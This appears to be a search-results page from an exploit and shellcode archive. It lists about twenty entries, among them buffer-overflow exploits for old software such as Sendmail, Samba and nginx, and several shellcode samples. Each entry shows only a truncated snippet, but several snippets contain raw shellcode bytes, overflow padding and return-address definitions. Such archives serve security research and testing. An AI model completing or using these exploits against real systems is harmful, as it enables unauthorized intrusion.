7261 matches found
Calavera UpLoader 3.5 - SEH Buffer Overflow
No description provided by source. exploit por Daniel - La Calavera Email: [email protected] Para CracksLatinoS relleno rell = \x41 477 rell1 = \x42 4000 head = \x41 8 head += \x0d\x0a\x31\x0d\x0a head1 = \x0d\x0a head2 = 170.1.1.0 head2 +=\x0d\x0a head2 +=\x22 head2 +=...
Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
No description provided by source. / Title: Linux x86 - execve/bin/bash, /bin/bash, -p, NULL - 33 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if -p not...
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)
No description provided by source. print ===================================================================== print Destiny Media Player 1.61 .lst File Local Stack Overflow Exploit\n print Discovered by : Encrypt3d.M!nd print exploit code by : suN8Hclf print Tested on : Windows 2000 SP4 Polish...
Qwik SMTP 0.3 - Remote Root Format String Exploit
No description provided by source. / qwik-smtp Remote Root Exploit ------------------------------- Bug found by: Dark Eagle darkeagle at list d0t ru Exploit coded by: Carlos Barros barros at barrossecurity d0t com Home Page: http://www.barrossecurity.com Exploitation techinique: This bug is a...
nginx 0.6.38 - Heap Corruption Exploit
No description provided by source. !/usr/bin/env python Exploit Title: nginx heap corruption Date: 08/26/2010 Author: aaron conole [email protected] Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz Version: = 0.6.38, = 0.7.61 Tested on: BT4R1 running nginx 0.6.38 locally CVE: 2009-26...
Xsok 1.02 - "-xsokdir" Local Buffer Overflow Game Exploit
No description provided by source. / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded by c0wboy c 0x333 Outsiders Security Labs / www.0x333.org / include stdio.h include unistd.h define BIN /usr/games/xsok define RETADD 0xbffffa3c define SIZE 200 unsigned char shellcode = /...
Sendmail 8.12.9 Prescan() Variant Remote Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8641/info Sendmail is prone to a buffer overrun vulnerability in the prescan function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute...
Veritas Backup Exec Name Service Overflow
No description provided by source. $Id: nameservice.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives such as IRIX ftpd or the ftp daemon shipped with Kerberos 5 contain a number of buffer overflows that may lead to a compromise of root access to malicious users. During parsing...
Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3681/info The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH. Versions...
Serial port shell binding, busybox Launching shellcode
No description provided by source. / General: Serial port shell binding, busybox launching shellcode.. yey! Specific: really wish i could tell you what i needed this for.. but meh.. this will bind a busybox sh shell to /dev/ttyS0, the shellcode does not alter the baudrate settings.. 9600 is the...
52 byte Linux MIPS execve
No description provided by source. include stdio.h / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32 addu $a0, $ra, 4097 addu...
os-x/ppc execve(/bin/sh), exit() 72 bytes
No description provided by source. / MacOSX/PowerPC Shellcode for: execve/bin/sh, /bin/sh, NULL, exit 72 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include stdio.h include string.h char shellcode = \x7c\xa5\x2a\x79 \x40\x82\xff\xfd \x7d\x68\x02\xa6 \x3b\xeb\x01\x71 \x39\x40\x01\x...
Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)
No description provided by source. source: http://www.securityfocus.com/bid/1158/info Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems. Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniff...
Hanso Player 1.4.0.0 - Buffer Overflow - DoS Skinfile
No description provided by source. Exploit Title: Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile Date: 05.02.2011 Author: Dame Jovanoskibadc0re Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe Version: 1.4.0.0 Tested on: XP sp3 from struct import import time...
openmovieeditor <= 0.0.20060901 (name) Local Buffer Overflow Exploit
No description provided by source. / openmovieeditor buffer overflow exploit by qnix qnixatbsdmaildotorg Dont forget to change the return address RETADDR -------------------------- devil: \ envt/envt -s 2 Shellcode: linux/x86 setuid0,setgid0 execve/bin/sh, /bin/sh, NULL 37 bytes + Setting memory...
linux/x86 normal exit with random (so to speak) return value 5 bytes
No description provided by source. / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik [email protected] / char shellcode = \x31\xc0 // xor %eax,%eax \x40 // inc %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...
Samba SMB 2.2.x,CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7106/info Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets. An attacker can exploit this vulnerability by creating a specially formatted...
SGI IRIX <= 6.4 permissions Buffer overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/417/info A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrar...
MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...